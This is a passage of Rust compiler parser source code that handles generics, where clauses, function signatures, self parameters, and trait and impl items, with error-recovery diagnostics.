attrs[0].span,
&format!("trailing attribute after generic parameter"),
)
.span_label(attrs[0].span, "attributes must go before parameters")
.emit();
} else {
self.struct_span_err(
attrs[0].span,
&format!("attribute without generic parameters"),
)
.span_label(
attrs[0].span,
"attributes are only permitted when preceding parameters",
)
.emit();
}
}
break
}
if !self.eat(&token::Comma) {
break
}
}
Ok(params)
}
/// Parses a set of optional generic type parameter declarations. Where
/// clauses are not parsed here, and must be added later via
/// `parse_where_clause()`.
///
/// matches generics = ( ) | ( < > ) | ( < typaramseq ( , )? > ) | ( < lifetimes ( , )? > )
/// | ( < lifetimes , typaramseq ( , )? > )
/// where typaramseq = ( typaram ) | ( typaram , typaramseq )
fn parse_generics(&mut self) -> PResult<'a, ast::Generics> {
let span_lo = self.span;
let (params, span) = if self.eat_lt() {
let params = self.parse_generic_params()?;
self.expect_gt()?;
(params, span_lo.to(self.prev_span))
} else {
(vec![], self.prev_span.between(self.span))
};
Ok(ast::Generics {
params,
where_clause: WhereClause {
id: ast::DUMMY_NODE_ID,
predicates: Vec::new(),
span: DUMMY_SP,
},
span,
})
}
/// Parses generic args (within a path segment) with recovery for extra leading angle brackets.
/// For the purposes of understanding the parsing logic of generic arguments, this function
/// can be thought of being the same as just calling `self.parse_generic_args()` if the source
/// had the correct amount of leading angle brackets.
///
/// ```ignore (diagnostics)
/// bar::<<<<T as Foo>::Output>();
/// ^^ help: remove extra angle brackets
/// ```
fn parse_generic_args_with_leaning_angle_bracket_recovery(
&mut self,
style: PathStyle,
lo: Span,
) -> PResult<'a, (Vec<GenericArg>, Vec<AssocTyConstraint>)> {
// We need to detect whether there are extra leading left angle brackets and produce an
// appropriate error and suggestion. This cannot be implemented by looking ahead at
// upcoming tokens for a matching `>` character - if there are unmatched `<` tokens
// then there won't be matching `>` tokens to find.
//
// To explain how this detection works, consider the following example:
//
// ```ignore (diagnostics)
// bar::<<<<T as Foo>::Output>();
// ^^ help: remove extra angle brackets
// ```
//
// Parsing of the left angle brackets starts in this function. We start by parsing the
// `<` token (incrementing the counter of unmatched angle brackets on `Parser` via
// `eat_lt`):
//
// *Upcoming tokens:* `<<<<T as Foo>::Output>;`
// *Unmatched count:* 1
// *`parse_path_segment` calls deep:* 0
//
// This has the effect of recursing as this function is called if a `<` character
// is found within the expected generic arguments:
//
// *Upcoming tokens:* `<<<T as Foo>::Output>;`
// *Unmatched count:* 2
// *`parse_path_segment` calls deep:* 1
//
// Eventually we will have recursed until having consumed all of the `<` tokens and
// this will be reflected in the count:
//
// *Upcoming tokens:* `T as Foo>::Output>;`
// *Unmatched count:* 4
// `parse_path_segment` calls deep:* 3
//
// The parser will continue until reaching the first `>` - this will decrement the
// unmatched angle bracket count and return to the parent invocation of this function
// having succeeded in parsing:
//
// *Upcoming tokens:* `::Output>;`
// *Unmatched count:* 3
// *`parse_path_segment` calls deep:* 2
//
// This will continue until the next `>` character which will also return successfully
// to the parent invocation of this function and decrement the count:
//
// *Upcoming tokens:* `;`
// *Unmatched count:* 2
// *`parse_path_segment` calls deep:* 1
//
// At this point, this function will expect to find another matching `>` character but
// won't be able to and will return an error. This will continue all the way up the
// call stack until the first invocation:
//
// *Upcoming tokens:* `;`
// *Unmatched count:* 2
// *`parse_path_segment` calls deep:* 0
//
// In doing this, we have managed to work out how many unmatched leading left angle
// brackets there are, but we cannot recover as the unmatched angle brackets have
// already been consumed. To remedy this, we keep a snapshot of the parser state
// before we do the above. We can then inspect whether we ended up with a parsing error
// and unmatched left angle brackets and if so, restore the parser state before we
// consumed any `<` characters to emit an error and consume the erroneous tokens to
// recover by attempting to parse again.
//
// In practice, the recursion of this function is indirect and there will be other
// locations that consume some `<` characters - as long as we update the count when
// this happens, it isn't an issue.
let is_first_invocation = style == PathStyle::Expr;
// Take a snapshot before attempting to parse - we can restore this later.
let snapshot = if is_first_invocation {
Some(self.clone())
} else {
None
};
debug!("parse_generic_args_with_leading_angle_bracket_recovery: (snapshotting)");
match self.parse_generic_args() {
Ok(value) => Ok(value),
Err(ref mut e) if is_first_invocation && self.unmatched_angle_bracket_count > 0 => {
// Cancel error from being unable to find `>`. We know the error
// must have been this due to a non-zero unmatched angle bracket
// count.
e.cancel();
// Swap `self` with our backup of the parser state before attempting to parse
// generic arguments.
let snapshot = mem::replace(self, snapshot.unwrap());
debug!(
"parse_generic_args_with_leading_angle_bracket_recovery: (snapshot failure) \
snapshot.count={:?}",
snapshot.unmatched_angle_bracket_count,
);
// Eat the unmatched angle brackets.
for _ in 0..snapshot.unmatched_angle_bracket_count {
self.eat_lt();
}
// Make a span over ${unmatched angle bracket count} characters.
let span = lo.with_hi(
lo.lo() + BytePos(snapshot.unmatched_angle_bracket_count)
);
let plural = snapshot.unmatched_angle_bracket_count > 1;
self.diagnostic()
.struct_span_err(
span,
&format!(
"unmatched angle bracket{}",
if plural { "s" } else { "" }
),
)
.span_suggestion(
span,
&format!(
"remove extra angle bracket{}",
if plural { "s" } else { "" }
),
String::new(),
Applicability::MachineApplicable,
)
.emit();
// Try again without unmatched angle bracket characters.
self.parse_generic_args()
},
Err(e) => Err(e),
}
}
/// Parses (possibly empty) list of lifetime and type arguments and associated type bindings,
/// possibly including trailing comma.
fn parse_generic_args(&mut self) -> PResult<'a, (Vec<GenericArg>, Vec<AssocTyConstraint>)> {
let mut args = Vec::new();
let mut constraints = Vec::new();
let mut misplaced_assoc_ty_constraints: Vec<Span> = Vec::new();
let mut assoc_ty_constraints: Vec<Span> = Vec::new();
let args_lo = self.span;
loop {
if self.check_lifetime() && self.look_ahead(1, |t| !t.is_like_plus()) {
// Parse lifetime argument.
args.push(GenericArg::Lifetime(self.expect_lifetime()));
misplaced_assoc_ty_constraints.append(&mut assoc_ty_constraints);
} else if self.check_ident() && self.look_ahead(1,
|t| t == &token::Eq || t == &token::Colon) {
// Parse associated type constraint.
let lo = self.span;
let ident = self.parse_ident()?;
let kind = if self.eat(&token::Eq) {
AssocTyConstraintKind::Equality {
ty: self.parse_ty()?,
}
} else if self.eat(&token::Colon) {
AssocTyConstraintKind::Bound {
bounds: self.parse_generic_bounds(Some(self.prev_span))?,
}
} else {
unreachable!();
};
let span = lo.to(self.prev_span);
constraints.push(AssocTyConstraint {
id: ast::DUMMY_NODE_ID,
ident,
kind,
span,
});
assoc_ty_constraints.push(span);
} else if self.check_const_arg() {
// Parse const argument.
let expr = if let token::OpenDelim(token::Brace) = self.token {
self.parse_block_expr(None, self.span, BlockCheckMode::Default, ThinVec::new())?
} else if self.token.is_ident() {
// FIXME(const_generics): to distinguish between idents for types and consts,
// we should introduce a GenericArg::Ident in the AST and distinguish when
// lowering to the HIR. For now, idents for const args are not permitted.
if self.token.is_keyword(kw::True) || self.token.is_keyword(kw::False) {
self.parse_literal_maybe_minus()?
} else {
return Err(
self.fatal("identifiers may currently not be used for const generics")
);
}
} else {
self.parse_literal_maybe_minus()?
};
let value = AnonConst {
id: ast::DUMMY_NODE_ID,
value: expr,
};
args.push(GenericArg::Const(value));
misplaced_assoc_ty_constraints.append(&mut assoc_ty_constraints);
} else if self.check_type() {
// Parse type argument.
args.push(GenericArg::Type(self.parse_ty()?));
misplaced_assoc_ty_constraints.append(&mut assoc_ty_constraints);
} else {
break
}
if !self.eat(&token::Comma) {
break
}
}
// FIXME: we would like to report this in ast_validation instead, but we currently do not
// preserve ordering of generic parameters with respect to associated type binding, so we
// lose that information after parsing.
if misplaced_assoc_ty_constraints.len() > 0 {
let mut err = self.struct_span_err(
args_lo.to(self.prev_span),
"associated type bindings must be declared after generic parameters",
);
for span in misplaced_assoc_ty_constraints {
err.span_label(
span,
"this associated type binding should be moved after the generic parameters",
);
}
err.emit();
}
Ok((args, constraints))
}
/// Parses an optional where-clause and places it in `generics`.
///
/// ```ignore (only-for-syntax-highlight)
/// where T : Trait<U, V> + 'b, 'a : 'b
/// ```
fn parse_where_clause(&mut self) -> PResult<'a, WhereClause> {
let mut where_clause = WhereClause {
id: ast::DUMMY_NODE_ID,
predicates: Vec::new(),
span: self.prev_span.to(self.prev_span),
};
if !self.eat_keyword(kw::Where) {
return Ok(where_clause);
}
let lo = self.prev_span;
// We are considering adding generics to the `where` keyword as an alternative higher-rank
// parameter syntax (as in `where<'a>` or `where<T>`. To avoid that being a breaking
// change we parse those generics now, but report an error.
if self.choose_generics_over_qpath() {
let generics = self.parse_generics()?;
self.struct_span_err(
generics.span,
"generic parameters on `where` clauses are reserved for future use",
)
.span_label(generics.span, "currently unsupported")
.emit();
}
loop {
let lo = self.span;
if self.check_lifetime() && self.look_ahead(1, |t| !t.is_like_plus()) {
let lifetime = self.expect_lifetime();
// Bounds starting with a colon are mandatory, but possibly empty.
self.expect(&token::Colon)?;
let bounds = self.parse_lt_param_bounds();
where_clause.predicates.push(ast::WherePredicate::RegionPredicate(
ast::WhereRegionPredicate {
span: lo.to(self.prev_span),
lifetime,
bounds,
}
));
} else if self.check_type() {
// Parse optional `for<'a, 'b>`.
// This `for` is parsed greedily and applies to the whole predicate,
// the bounded type can have its own `for` applying only to it.
// Examples:
// * `for<'a> Trait1<'a>: Trait2<'a /* ok */>`
// * `(for<'a> Trait1<'a>): Trait2<'a /* not ok */>`
// * `for<'a> for<'b> Trait1<'a, 'b>: Trait2<'a /* ok */, 'b /* not ok */>`
let lifetime_defs = self.parse_late_bound_lifetime_defs()?;
// Parse type with mandatory colon and (possibly empty) bounds,
// or with mandatory equality sign and the second type.
let ty = self.parse_ty()?;
if self.eat(&token::Colon) {
let bounds = self.parse_generic_bounds(Some(self.prev_span))?;
where_clause.predicates.push(ast::WherePredicate::BoundPredicate(
ast::WhereBoundPredicate {
span: lo.to(self.prev_span),
bound_generic_params: lifetime_defs,
bounded_ty: ty,
bounds,
}
));
// FIXME: Decide what should be used here, `=` or `==`.
// FIXME: We are just dropping the binders in lifetime_defs on the floor here.
} else if self.eat(&token::Eq) || self.eat(&token::EqEq) {
let rhs_ty = self.parse_ty()?;
where_clause.predicates.push(ast::WherePredicate::EqPredicate(
ast::WhereEqPredicate {
span: lo.to(self.prev_span),
lhs_ty: ty,
rhs_ty,
id: ast::DUMMY_NODE_ID,
}
));
} else {
return self.unexpected();
}
} else {
break
}
if !self.eat(&token::Comma) {
break
}
}
where_clause.span = lo.to(self.prev_span);
Ok(where_clause)
}
fn parse_fn_args(&mut self, named_args: bool, allow_c_variadic: bool)
-> PResult<'a, (Vec<Arg> , bool)> {
self.expect(&token::OpenDelim(token::Paren))?;
let sp = self.span;
let mut c_variadic = false;
let (args, recovered): (Vec<Option<Arg>>, bool) =
self.parse_seq_to_before_end(
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| {
// If the argument is a C-variadic argument we should not
// enforce named arguments.
let enforce_named_args = if p.token == token::DotDotDot {
false
} else {
named_args
};
match p.parse_arg_general(enforce_named_args, false,
allow_c_variadic) {
Ok(arg) => {
if let TyKind::CVarArgs = arg.ty.node {
c_variadic = true;
if p.token != token::CloseDelim(token::Paren) {
let span = p.span;
p.span_err(span,
"`...` must be the last argument of a C-variadic function");
Ok(None)
} else {
Ok(Some(arg))
}
} else {
Ok(Some(arg))
}
},
Err(mut e) => {
e.emit();
let lo = p.prev_span;
// Skip every token until next possible arg or end.
p.eat_to_tokens(&[&token::Comma, &token::CloseDelim(token::Paren)]);
// Create a placeholder argument for proper arg count (issue #34264).
let span = lo.to(p.prev_span);
Ok(Some(dummy_arg(Ident::new(kw::Invalid, span))))
}
}
}
)?;
if !recovered {
self.eat(&token::CloseDelim(token::Paren));
}
let args: Vec<_> = args.into_iter().filter_map(|x| x).collect();
if c_variadic && args.is_empty() {
self.span_err(sp,
"C-variadic function must be declared with at least one named argument");
}
Ok((args, c_variadic))
}
/// Parses the argument list and result type of a function declaration.
fn parse_fn_decl(&mut self, allow_c_variadic: bool) -> PResult<'a, P<FnDecl>> {
let (args, c_variadic) = self.parse_fn_args(true, allow_c_variadic)?;
let ret_ty = self.parse_ret_ty(true)?;
Ok(P(FnDecl {
inputs: args,
output: ret_ty,
c_variadic,
}))
}
/// Returns the parsed optional self argument and whether a self shortcut was used.
fn parse_self_arg(&mut self) -> PResult<'a, Option<Arg>> {
let expect_ident = |this: &mut Self| match this.token {
// Preserve hygienic context.
token::Ident(ident, _) =>
{ let span = this.span; this.bump(); Ident::new(ident.name, span) }
_ => unreachable!()
};
let isolated_self = |this: &mut Self, n| {
this.look_ahead(n, |t| t.is_keyword(kw::SelfLower)) &&
this.look_ahead(n + 1, |t| t != &token::ModSep)
};
// Parse optional `self` parameter of a method.
// Only a limited set of initial token sequences is considered `self` parameters; anything
// else is parsed as a normal function parameter list, so some lookahead is required.
let eself_lo = self.span;
let (eself, eself_ident, eself_hi) = match self.token {
token::BinOp(token::And) => {
// `&self`
// `&mut self`
// `&'lt self`
// `&'lt mut self`
// `¬_self`
(if isolated_self(self, 1) {
self.bump();
SelfKind::Region(None, Mutability::Immutable)
} else if self.is_keyword_ahead(1, &[kw::Mut]) &&
isolated_self(self, 2) {
self.bump();
self.bump();
SelfKind::Region(None, Mutability::Mutable)
} else if self.look_ahead(1, |t| t.is_lifetime()) &&
isolated_self(self, 2) {
self.bump();
let lt = self.expect_lifetime();
SelfKind::Region(Some(lt), Mutability::Immutable)
} else if self.look_ahead(1, |t| t.is_lifetime()) &&
self.is_keyword_ahead(2, &[kw::Mut]) &&
isolated_self(self, 3) {
self.bump();
let lt = self.expect_lifetime();
self.bump();
SelfKind::Region(Some(lt), Mutability::Mutable)
} else {
return Ok(None);
}, expect_ident(self), self.prev_span)
}
token::BinOp(token::Star) => {
// `*self`
// `*const self`
// `*mut self`
// `*not_self`
// Emit special error for `self` cases.
let msg = "cannot pass `self` by raw pointer";
(if isolated_self(self, 1) {
self.bump();
self.struct_span_err(self.span, msg)
.span_label(self.span, msg)
.emit();
SelfKind::Value(Mutability::Immutable)
} else if self.look_ahead(1, |t| t.is_mutability()) &&
isolated_self(self, 2) {
self.bump();
self.bump();
self.struct_span_err(self.span, msg)
.span_label(self.span, msg)
.emit();
SelfKind::Value(Mutability::Immutable)
} else {
return Ok(None);
}, expect_ident(self), self.prev_span)
}
token::Ident(..) => {
if isolated_self(self, 0) {
// `self`
// `self: TYPE`
let eself_ident = expect_ident(self);
let eself_hi = self.prev_span;
(if self.eat(&token::Colon) {
let ty = self.parse_ty()?;
SelfKind::Explicit(ty, Mutability::Immutable)
} else {
SelfKind::Value(Mutability::Immutable)
}, eself_ident, eself_hi)
} else if self.token.is_keyword(kw::Mut) &&
isolated_self(self, 1) {
// `mut self`
// `mut self: TYPE`
self.bump();
let eself_ident = expect_ident(self);
let eself_hi = self.prev_span;
(if self.eat(&token::Colon) {
let ty = self.parse_ty()?;
SelfKind::Explicit(ty, Mutability::Mutable)
} else {
SelfKind::Value(Mutability::Mutable)
}, eself_ident, eself_hi)
} else {
return Ok(None);
}
}
_ => return Ok(None),
};
let eself = source_map::respan(eself_lo.to(eself_hi), eself);
Ok(Some(Arg::from_self(eself, eself_ident)))
}
/// Parses the parameter list and result type of a function that may have a `self` parameter.
fn parse_fn_decl_with_self<F>(&mut self, parse_arg_fn: F) -> PResult<'a, P<FnDecl>>
where F: FnMut(&mut Parser<'a>) -> PResult<'a, Arg>,
{
self.expect(&token::OpenDelim(token::Paren))?;
// Parse optional self argument.
let self_arg = self.parse_self_arg()?;
// Parse the rest of the function parameter list.
let sep = SeqSep::trailing_allowed(token::Comma);
let (mut fn_inputs, recovered) = if let Some(self_arg) = self_arg {
if self.check(&token::CloseDelim(token::Paren)) {
(vec![self_arg], false)
} else if self.eat(&token::Comma) {
let mut fn_inputs = vec![self_arg];
let (mut input, recovered) = self.parse_seq_to_before_end(
&token::CloseDelim(token::Paren), sep, parse_arg_fn)?;
fn_inputs.append(&mut input);
(fn_inputs, recovered)
} else {
match self.expect_one_of(&[], &[]) {
Err(err) => return Err(err),
Ok(recovered) => (vec![self_arg], recovered),
}
}
} else {
self.parse_seq_to_before_end(&token::CloseDelim(token::Paren), sep, parse_arg_fn)?
};
if !recovered {
// Parse closing paren and return type.
self.expect(&token::CloseDelim(token::Paren))?;
}
// Replace duplicated recovered arguments with `_` pattern to avoid unecessary errors.
self.deduplicate_recovered_arg_names(&mut fn_inputs);
Ok(P(FnDecl {
inputs: fn_inputs,
output: self.parse_ret_ty(true)?,
c_variadic: false
}))
}
/// Parses the `|arg, arg|` header of a closure.
fn parse_fn_block_decl(&mut self) -> PResult<'a, P<FnDecl>> {
let inputs_captures = {
if self.eat(&token::OrOr) {
Vec::new()
} else {
self.expect(&token::BinOp(token::Or))?;
let args = self.parse_seq_to_before_tokens(
&[&token::BinOp(token::Or), &token::OrOr],
SeqSep::trailing_allowed(token::Comma),
TokenExpectType::NoExpect,
|p| p.parse_fn_block_arg()
)?.0;
self.expect_or()?;
args
}
};
let output = self.parse_ret_ty(true)?;
Ok(P(FnDecl {
inputs: inputs_captures,
output,
c_variadic: false
}))
}
/// Parses the name and optional generic types of a function header.
fn parse_fn_header(&mut self) -> PResult<'a, (Ident, ast::Generics)> {
let id = self.parse_ident()?;
let generics = self.parse_generics()?;
Ok((id, generics))
}
fn mk_item(&self, span: Span, ident: Ident, node: ItemKind, vis: Visibility,
attrs: Vec<Attribute>) -> P<Item> {
P(Item {
ident,
attrs,
id: ast::DUMMY_NODE_ID,
node,
vis,
span,
tokens: None,
})
}
/// Parses an item-position function declaration.
fn parse_item_fn(&mut self,
unsafety: Unsafety,
asyncness: Spanned<IsAsync>,
constness: Spanned<Constness>,
abi: Abi)
-> PResult<'a, ItemInfo> {
let (ident, mut generics) = self.parse_fn_header()?;
let allow_c_variadic = abi == Abi::C && unsafety == Unsafety::Unsafe;
let decl = self.parse_fn_decl(allow_c_variadic)?;
generics.where_clause = self.parse_where_clause()?;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
let header = FnHeader { unsafety, asyncness, constness, abi };
Ok((ident, ItemKind::Fn(decl, header, generics, body), Some(inner_attrs)))
}
/// Returns `true` if we are looking at `const ID`
/// (returns `false` for things like `const fn`, etc.).
fn is_const_item(&self) -> bool {
self.token.is_keyword(kw::Const) &&
!self.is_keyword_ahead(1, &[kw::Fn, kw::Unsafe])
}
/// Parses all the "front matter" for a `fn` declaration, up to
/// and including the `fn` keyword:
///
/// - `const fn`
/// - `unsafe fn`
/// - `const unsafe fn`
/// - `extern fn`
/// - etc.
fn parse_fn_front_matter(&mut self)
-> PResult<'a, (
Spanned<Constness>,
Unsafety,
Spanned<IsAsync>,
Abi
)>
{
let is_const_fn = self.eat_keyword(kw::Const);
let const_span = self.prev_span;
let unsafety = self.parse_unsafety();
let asyncness = self.parse_asyncness();
let asyncness = respan(self.prev_span, asyncness);
let (constness, unsafety, abi) = if is_const_fn {
(respan(const_span, Constness::Const), unsafety, Abi::Rust)
} else {
let abi = if self.eat_keyword(kw::Extern) {
self.parse_opt_abi()?.unwrap_or(Abi::C)
} else {
Abi::Rust
};
(respan(self.prev_span, Constness::NotConst), unsafety, abi)
};
if !self.eat_keyword(kw::Fn) {
// It is possible for `expect_one_of` to recover given the contents of
// `self.expected_tokens`, therefore, do not use `self.unexpected()` which doesn't
// account for this.
if !self.expect_one_of(&[], &[])? { unreachable!() }
}
Ok((constness, unsafety, asyncness, abi))
}
/// Parses an impl item.
pub fn parse_impl_item(&mut self, at_end: &mut bool) -> PResult<'a, ImplItem> {
maybe_whole!(self, NtImplItem, |x| x);
let attrs = self.parse_outer_attributes()?;
let mut unclosed_delims = vec![];
let (mut item, tokens) = self.collect_tokens(|this| {
let item = this.parse_impl_item_(at_end, attrs);
unclosed_delims.append(&mut this.unclosed_delims);
item
})?;
self.unclosed_delims.append(&mut unclosed_delims);
// See `parse_item` for why this clause is here.
if !item.attrs.iter().any(|attr| attr.style == AttrStyle::Inner) {
item.tokens = Some(tokens);
}
Ok(item)
}
fn parse_impl_item_(&mut self,
at_end: &mut bool,
mut attrs: Vec<Attribute>) -> PResult<'a, ImplItem> {
let lo = self.span;
let vis = self.parse_visibility(false)?;
let defaultness = self.parse_defaultness();
let (name, node, generics) = if let Some(type_) = self.eat_type() {
let (name, alias, generics) = type_?;
let kind = match alias {
AliasKind::Weak(typ) => ast::ImplItemKind::Type(typ),
AliasKind::Existential(bounds) => ast::ImplItemKind::Existential(bounds),
};
(name, kind, generics)
} else if self.is_const_item() {
// This parses the grammar:
// ImplItemConst = "const" Ident ":" Ty "=" Expr ";"
self.expect_keyword(kw::Const)?;
let name = self.parse_ident()?;
self.expect(&token::Colon)?;
let typ = self.parse_ty()?;
self.expect(&token::Eq)?;
let expr = self.parse_expr()?;
self.expect(&token::Semi)?;
(name, ast::ImplItemKind::Const(typ, expr), ast::Generics::default())
} else {
let (name, inner_attrs, generics, node) = self.parse_impl_method(&vis, at_end)?;
attrs.extend(inner_attrs);
(name, node, generics)
};
Ok(ImplItem {
id: ast::DUMMY_NODE_ID,
span: lo.to(self.prev_span),
ident: name,
vis,
defaultness,
attrs,
generics,
node,
tokens: None,
})
}
fn complain_if_pub_macro(&self, vis: &VisibilityKind, sp: Span) {
match *vis {
VisibilityKind::Inherited => {}
_ => {
let is_macro_rules: bool = match self.token {
token::Ident(sid, _) => sid.name == sym::macro_rules,
_ => false,
};
let mut err = if is_macro_rules {
let mut err = self.diagnostic()
.struct_span_err(sp, "can't qualify macro_rules invocation with `pub`");
err.span_suggestion(
sp,
"try exporting the macro",
"#[macro_export]".to_owned(),
Applicability::MaybeIncorrect // speculative
);
err
} else {
let mut err = self.diagnostic()
.struct_span_err(sp, "can't qualify macro invocation with `pub`");
err.help("try adjusting the macro to put `pub` inside the invocation");
err
};
err.emit();
}
}
}
fn missing_assoc_item_kind_err(&self, item_type: &str, prev_span: Span)
-> DiagnosticBuilder<'a>
{
let expected_kinds = if item_type == "extern" {
"missing `fn`, `type`, or `static`"
} else {
"missing `fn`, `type`, or `const`"
};
// Given this code `path(`, it seems like this is not
// setting the visibility of a macro invocation, but rather
// a mistyped method declaration.
// Create a diagnostic pointing out that `fn` is missing.
//
// x | pub path(&self) {
// | ^ missing `fn`, `type`, or `const`
// pub path(
// ^^ `sp` below will point to this
let sp = prev_span.between(self.prev_span);
let mut err = self.diagnostic().struct_span_err(
sp,
&format!("{} for {}-item declaration",
expected_kinds, item_type));
err.span_label(sp, expected_kinds);
err
}
/// Parse a method or a macro invocation in a trait impl.
fn parse_impl_method(&mut self, vis: &Visibility, at_end: &mut bool)
-> PResult<'a, (Ident, Vec<Attribute>, ast::Generics,
ast::ImplItemKind)> {
// code copied from parse_macro_use_or_failure... abstraction!
if let Some(mac) = self.parse_assoc_macro_invoc("impl", Some(vis), at_end)? {
// method macro
Ok((Ident::invalid(), vec![], ast::Generics::default(),
ast::ImplItemKind::Macro(mac)))
} else {
let (constness, unsafety, asyncness, abi) = self.parse_fn_front_matter()?;
let ident = self.parse_ident()?;
let mut generics = self.parse_generics()?;
let decl = self.parse_fn_decl_with_self(|p| {
p.parse_arg_general(true, true, false)
})?;
generics.where_clause = self.parse_where_clause()?;
*at_end = true;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
let header = ast::FnHeader { abi, unsafety, constness, asyncness };
Ok((ident, inner_attrs, generics, ast::ImplItemKind::Method(
ast::MethodSig { header, decl },
body
)))
}
}
/// Parses `trait Foo { ... }` or `trait Foo = Bar;`.
fn parse_item_trait(&mut self, is_auto: IsAuto, unsafety: Unsafety) -> PResult<'a, ItemInfo> {
let ident = self.parse_ident()?;
let mut tps = self.parse_generics()?;
// Parse optional colon and supertrait bounds.
let bounds = if self.eat(&token::Colon) {
self.parse_generic_bounds(Some(self.prev_span))?
} else {
Vec::new()
};
if self.eat(&token::Eq) {
// it's a trait alias
let bounds = self.parse_generic_bounds(None)?;
tps.where_clause = self.parse_where_clause()?;
self.expect(&token::Semi)?;
if is_auto == IsAuto::Yes {
let msg = "trait aliases cannot be `auto`";
self.struct_span_err(self.prev_span, msg)
.span_label(self.prev_span, msg)
.emit();
}
if unsafety != Unsafety::Normal {
let msg = "trait aliases cannot be `unsafe`";
self.struct_span_err(self.prev_span, msg)
.span_label(self.prev_span, msg)
.emit();
}
Ok((ident, ItemKind::TraitAlias(tps, bounds), None))
} else {
// it's a normal trait
tps.where_clause = self.parse_where_clause()?;
self.expect(&token::OpenDelim(token::Brace))?;
let mut trait_items = vec![];
while !self.eat(&token::CloseDelim(token::Brace)) {
if let token::DocComment(_) = self.token {
if self.look_ahead(1,
|tok| tok == &token::Token::CloseDelim(token::Brace)) {
let mut err = self.diagnostic().struct_span_err_with_code(
self.span,
"found a documentation comment that doesn't document anything",
DiagnosticId::Error("E0584".into()),
);
err.help("doc comments must come before what they document, maybe a \
comment was intended with `//`?",
);
err.emit();
self.bump();
continue;
}
}
let mut at_end = false;
match self.parse_trait_item(&mut at_end) {
Ok(item) => trait_items.push(item),
Err(mut e) => {
e.emit();
if !at_end {
self.recover_stmt_(SemiColonMode::Break, BlockMode::Break);
}
}
}
}
Ok((ident, ItemKind::Trait(is_auto, unsafety, tps, bounds, trait_items), None))
}
}
fn choose_generics_over_qpath(&self) -> bool {
// There's an ambiguity between generic parameters and qualified paths in impls.
// If we see `<` it may start both, so we have to inspect some following tokens.
// The following combinations can only start generics,
// but not qualified paths (with one exception):
// `<` `>` - empty generic parameters
// `<` `#` - generic parameters with attributes
// `<` (LIFETIME|IDENT) `>` - single generic parameter
// `<` (LIFETIME|IDENT) `,` - first generic parameter in a list
// `<` (LIFETIME|IDENT) `:` - generic parameter with bounds
// `<` (LIFETIME|IDENT) `=` - generic parameter with a default
// `<` const - generic const parameter
// The only truly ambiguous case is
// `<` IDENT `>` `::` IDENT ...
// we disambiguate it in favor of generics (`impl<T> ::absolute::Path<T> { ... }`)
// because this is what almost always expected in practice, qualified paths in impls
// (`impl <Type>::AssocTy { ... }`) aren't even allowed by type checker at the moment.
self.token == token::Lt &&
(self.look_ahead(1, |t| t == &token::Pound || t == &token::Gt) ||
self.look_ahead(1, |t| t.is_lifetime() || t.is_ident()) &&
self.look_ahead(2, |t| t == &token::Gt || t == &token::Comma ||
t == &token::Colon || t == &token::Eq) ||
self.is_keyword_ahead(1, &[kw::Const]))
}
fn parse_impl_body(&mut self) -> PResult<'a, (Vec<ImplItem>, Vec<Attribute>)> {
self.expect(&token::OpenDelim(token::Brace))?;
let attrs = self.parse_inner_attributes()?;
let mut impl_items = Vec::new();
while !self.eat(&token::CloseDelim(token::Brace)) {
let mut at_end = false;
match self.parse_impl_item(&mut at_end) {
Ok(impl_item) => impl_items.push(impl_item),
Err(mut err) => {
err.emit();
if !at_end {
self.recover_stmt_(SemiColonMode::Break, BlockMode::Break);
}
}
}
}
Ok((impl_items, attrs))
}
/// Parses an implementation item, `impl` keyword is already parsed.
///
/// impl<'a, T> TYPE { /* impl items */ }
/// impl<'a, T> TRAIT for TYPE { /* impl items */ }
/// impl<'a, T> !TRAIT for TYPE { /* impl items */ }
///
/// We actually parse slightly more relaxed grammar for better error reporting and recovery.
/// `impl` GENERICS `!`? TYPE `for`? (TYPE | `..`) (`where` PREDICATES)? `{` BODY `}`
/// `impl` GENERICS `!`? TYPE (`where` PREDICATES)? `{` BODY `}`
fn parse_item_impl(&mut self, unsafety: Unsafety, defaultness: Defaultness)
-> PResult<'a, ItemInfo> {
// First, parse generic parameters if necessary.
let mut generics = if self.choose_generics_over_qpath() {
self.parse_generics()?
} else {
ast::Generics::default()
};
// Disambiguate `impl !Trait for Type { ... }` and `impl ! { ... }` for the never type.
let polarity = if self.check(&token::Not) && self.look_ahead(1, |t| t.can_begin_type()) {
self.bump(); // `!`
ast::ImplPolarity::Negative
} else {
ast::ImplPolarity::Positive
};
// Parse both types and traits as a type, then reinterpret if necessary.
let err_path = |span| ast::Path::from_ident(Ident::new(kw::Invalid, span));
let ty_first = if self.token.is_keyword(kw::For) &&
self.look_ahead(1, |t| t != &token::Lt) {
let span = self.prev_span.between(self.span);
self.struct_span_err(span, "missing trait in a trait impl").emit();
P(Ty { node: TyKind::Path(None, err_path(span)), span, id: ast::DUMMY_NODE_ID })
} else {
self.parse_ty()?
};
// If `for` is missing we try to recover.
let has_for = self.eat_keyword(kw::For);
let missing_for_span = self.prev_span.between(self.span);
let ty_second = if self.token == token::DotDot {
// We need to report this error after `cfg` expansion for compatibility reasons
self.bump(); // `..`, do not add it to expected tokens
Some(DummyResult::raw_ty(self.prev_span, true))
} else if has_for || self.token.can_begin_type() {
Some(self.parse_ty()?)
} else {
None
};
generics.where_clause = self.parse_where_clause()?;
let (impl_items, attrs) = self.parse_impl_body()?;
let item_kind = match ty_second {
Some(ty_second) => {
// impl Trait for Type
if !has_for {
self.struct_span_err(missing_for_span, "missing `for` in a trait impl")
.span_suggestion_short(
missing_for_span,
"add `for` here",
" for ".to_string(),
Applicability::MachineApplicable,
).emit();
}
let ty_first = ty_first.into_inner();
let path = match ty_first.node {
// This notably includes paths passed through `ty` macro fragments (#46438).
TyKind::Path(None, path) => path,
_ => {
self.span_err(ty_first.span, "expected a trait, found type");
err_path(ty_first.span)
}
};
let trait_ref = TraitRef { path, ref_id: ty_first.id };
ItemKind::Impl(unsafety, polarity, defaultness,
generics, Some(trait_ref), ty_second, impl_items)
}
None => {
// impl Type
ItemKind::Impl(unsafety, polarity, defaultness,
generics, None, ty_first, impl_items)
}
};
Ok((Ident::invalid(), item_kind, Some(attrs)))
}
fn parse_late_bound_lifetime_defs(&mut self) -> PResult<'a, Vec<GenericParam>> {
if self.eat_keyword(kw::For) {
self.expect_lt()?;
let params = self.parse_generic_params()?;
self.expect_gt()?;
// We rely on AST validation to rule out invalid cases: There must not be type
// parameters, and the lifetime parameters must not have bounds.
Ok(params)
} else {
Ok(Vec::new())
}
}
